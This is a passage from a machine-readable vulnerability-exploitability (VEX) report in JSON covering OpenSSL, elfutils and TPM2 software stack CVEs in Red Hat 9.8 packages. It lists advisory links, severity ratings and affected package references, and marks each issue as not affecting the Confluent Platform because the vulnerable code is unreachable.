          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380335"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13176"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21574"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21575"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21577"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21579"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21580"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21581"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21584"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21585"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30681"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30682"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30683"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30684"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30685"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30687"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30688"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30689"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30693"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30695"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30696"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30699"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30703"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30704"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30705"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30721"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30722"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50077"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50080"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50081"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50082"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50083"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50085"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50086"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50087"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50088"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50091"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50093"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50094"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50096"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50098"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50099"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50100"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50101"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50102"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5399"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-16046.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:15699"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9fv-h47r-823f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07272b05b04836a762b4baa874958af51d513844"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2af62e74fb59bc469506bc37eb2990ea408d9467"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/392dcb336405a0c94486aa6655057f59fd3a0902"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4b1cb94a734a7d4ec363ac0a215a25c181e11f65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77c608f4c8857e63e98e66444e2e761c9627916f"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/0d5fd1ab987f7571e2c955d8d8b638fc0fb54ded"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/a2639000db19878d5d89586ae7b725080592ae86"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-13176.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-16046.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13176"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250120.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7264-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7278-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2025.html#AppendixMSQL"
        }
      ],
      "published": "2025-01-20T14:15:26+00:00",
      "updated": "2026-06-17T07:01:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-25260",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-25260"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-25260"
        },
        {
          "url": "https://github.com/schsiung/fuzzer_issues/issues/1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058"
        },
        {
          "url": "https://sourceware.org/elfutils/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
        }
      ],
      "published": "2024-02-20T18:15:52+00:00",
      "updated": "2026-06-17T07:15:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-29040",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        502
      ],
      "description": "This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This \nissue has been patched in version 4.1.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-29040"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-29040"
        },
        {
